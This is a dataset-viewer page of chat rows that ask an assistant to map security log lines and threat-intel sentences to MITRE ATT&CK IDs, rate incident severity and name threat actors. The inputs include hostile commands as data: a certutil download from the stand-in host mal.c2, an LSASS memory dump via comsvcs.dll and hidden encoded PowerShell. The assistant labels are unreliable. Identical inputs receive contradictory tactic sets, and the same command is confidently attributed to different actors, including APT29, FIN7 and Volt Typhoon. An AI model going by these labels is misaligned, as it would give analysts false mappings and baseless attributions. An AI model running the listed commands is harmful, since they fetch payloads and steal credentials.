messages listlengths 2 2 |
|---|
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-X1JV1J9SM1)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Defense Evasion",
"role": "user"
},
{
"content": "... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: APT39 has created scheduled tasks for persistence.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1053.005\", \"T1053\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-17VHHMI8IV)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.52.173.184",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3686 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.104.243.131",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0007... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.156.14.206",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T10... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: reg query HKLM /f password /t REG_SZ /s",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: ObliqueRAT has gained execution on targeted systems through luring users to click on links to malicious URLs.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204\", \"T1... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.136.35.185",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: APT29 used the Get-ManagementRoleAssignment PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"]... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.90.222.135",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-WYDRY4IGFS)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Collection",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.46.24.123",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0043... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Derusbi is capable of obtaining directory, file, and drive listings.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.70.192.205",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566.001\"]}",
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-G5DS9YJDV9)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Execution",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Night Dragon sent spearphishing emails containing links to compromised websites where malware was downloaded.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1566.002\"]}",
"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.33.41.184",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence\": \"Hig... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.158.50.31",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0040\", \"TA0002\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Some server-side components of adversary tools may have default values set for SSL/TLS certificates.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1588.004\", \"T1588\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.165.58.3",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0006\"], \"techniques... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Restrict write access to the /Library/Security/SecurityAgentPlugins directory.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0006\"], \"techniques\": [\"T1556\"]}",
"rol... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-XK15YVMGDR)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Discovery, Defense Evasion, Persistence",
"role": "user"
},... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typh... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may develop malware and malware components that can be used during targeting.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1587\", \"T1587.001\"]}",
"role": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-ACI03OP8V6)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Persistence, Privilege Escalation",
"role": "user"
},
{
"content"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: master boot record wiper",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: ShadowPad has injected an install module into a newly created process.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055\"]}",
"role": "assistant"
}
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"co... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-O47CDDQTKG)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Defense Evasion, Discovery",
"role": "user"
},
{
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.189.42.134",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0043\", \"TA0008\"], \"techniques\": [\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"technique... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-QDNRGOOV8T)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \"Ex... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-T3BR2CUQ3D)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Command and Control, Initial Access",
"role": "user... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2397 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.7.0.139",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confid... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-2NE2YB28A6)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\"severity\": \"E... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confid... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-F3T0HOVH76)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Reconnaissance",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-A45C41TWZ3)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery, Exfiltration, Privilege Escalation",
"role": "user... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-PKFRZU822D)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration",
"role": "user"
},
{
"content": "{\"severity\": \"High\",... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-CJPN9SPC44)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Discovery",
"role": "user"
},
{
"content... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: These may also highlight DHCP issues such as when IP allocations are low or have run out.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1557\", \"T1557.003\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.150.109.5",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 901 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-NRQC9JXTSW)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-GKCWUK9TLV)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access, Exfiltration",
"role": "user"
},
{
"content": "... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.145.65.67",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0009\", \"TA000... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-CRHF7WQI68)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: It then calls the subfunction with the argument of 2 to get the string that it will use as the HTTP POST request",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\"]}"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"}"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-6N3E2CIYTQ)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Execution, Initial Access, Impact",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.143.72.2",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0011\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-NN198UFUZW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery, Lateral Movement",
"role": "user"
},
{
"content": "... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: C:\\Windows\\System32\\sethc.exe",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.008\", \"T1546\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.81.24.209",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-CQK8NCTUD7)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution, Credential Access",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3716 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.156.169.137",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0008\"], \"techniques\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-XD9M12G7JB)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Credential Access, Defense Evasion",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.83.81.25",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0004\", ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 751 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.8.151.104",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0040\", \"TA0009\"], \"tec... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2273 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.99.90.218",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA001... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1610 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.59.64.107",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0008\"], ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-BHSN9VU265)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Command and Control, Defense Evasion",
"role": "us... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.8.226.163",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0043\", \"TA0007\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confidence\... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.149.39.152",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0005\"]... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.139.60.126",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The Trojan then gets the hexadecimal values of the compressed data and will replace the following hexadecimal values on each line with ASCII characters to further compressed the data: String of hexadecimal values Charact... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Linux Rabbit sends the payload from the C2 server as an encoded URL parameter.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-5TC1GB5ELM)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Discovery, Command and Control",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.183.22.237",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.179.250.75",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0040\"], \"techniques... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-OZ3IAW1LRR)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Execution, Collection",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: BRONZE BUTLER has used net user /domain to identify account information.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1087.002\", \"T1087\"]}",
"role": "assistant"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-G1P3NT57D8)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution, Lateral Movement",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-FY490XI4RV)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Kimsuky has compromised legitimate sites and used them to distribute malware.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1584.001\", \"T1584\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: If SIP is enabled, the kext signature is verified before being added to the AuxKC.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547\", \"T1547.006\"]}",
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: PlugX can use RC4 encryption in C2 communications.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1115 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confiden... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.114.76.124",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-9MQ9R5XPMH)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Zeus Panda checks for the existence of a Registry key and if it contains certain values.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1012\"]}",
"role": "assistant... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.